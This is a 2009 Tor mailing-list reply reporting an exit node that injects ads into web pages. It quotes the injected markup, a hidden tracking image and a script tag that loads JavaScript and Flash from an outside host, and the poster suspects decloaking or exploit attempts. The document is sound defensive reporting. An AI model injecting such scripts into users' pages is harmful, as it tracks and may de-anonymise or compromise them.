Re: Banners injected in web pages at exit nodes TRHCourtney*
- To: or-talk@xxxxxxxxxxxxx
- Subject: Re: Banners injected in web pages at exit nodes TRHCourtney*
- From: Freemor <freemor@xxxxxxxxx>
- Date: Tue, 2 Jun 2009 09:20:11 -0300
- Delivered-to: archiver@xxxxxxxx
- Delivered-to: or-talk-outgoing@xxxxxxxx
- Delivered-to: or-talk@xxxxxxxx
- Delivery-date: Tue, 02 Jun 2009 08:20:26 -0400
- In-reply-to: <e646fda30906020436q65f2e069ic873d253f057277f@xxxxxxxxxxxxxx>
- References: <20090602112258.C864914085B6@xxxxxxxxxxxxxx> <e646fda30906020436q65f2e069ic873d253f057277f@xxxxxxxxxxxxxx>
- Reply-to: or-talk@xxxxxxxxxxxxx
- Sender: owner-or-talk@xxxxxxxxxxxxx
On Tue, 2 Jun 2009 05:36:43 -0600
John Brooks <special@xxxxxxxxxxxxxxxx> wrote:
> Definitely abusive. Fortunately, because of how nearby most of the IPs
> are, Tor will treat them as family even if the operator neglected to,
> so it doesn't pose a risk to anonymity (other than the one outlying
> node, but even then it's a maximum of two), but this definitely looks
> like a badexit situation.
>
> Honestly, why does somebody run a tor node if they keep
> connection/session logs? Seems like an odd place to look for a
> paycheck.
>
> - John Brooks
>
Might be worse than that.. at least for improperly configured clients..
there does seem to be JavaScript injection:
<div id="floaterma9">
<img src="http://courtney.nullroute.net/2lol.gif" style="display:none"></img>
<script type='text/javascript' src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script>
<style>
body {
    margin: 0 0 0 0 !important;
}
#Banner2 {
    width:728px;
    height:90px;
}
#textme {
    font-family:arial;
    color:#333;
    font-size:11px;
}
</style>
When I followed
http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1
it had an interesting bit of code which linked to:
http://courtney.nullroute.net/openx-2.8.1/www/delivery/fl.js
Which tries to load up SWF objects..
Haven't picked it all apart yet (still no coffee) but I'm guessing it's
either decloaking attempts or exploit attempts.
--
freemor@xxxxxxxxx
freemor@xxxxxxxx
This e-mail has been digitally signed with GnuPG - ( http://gnupg.org/ )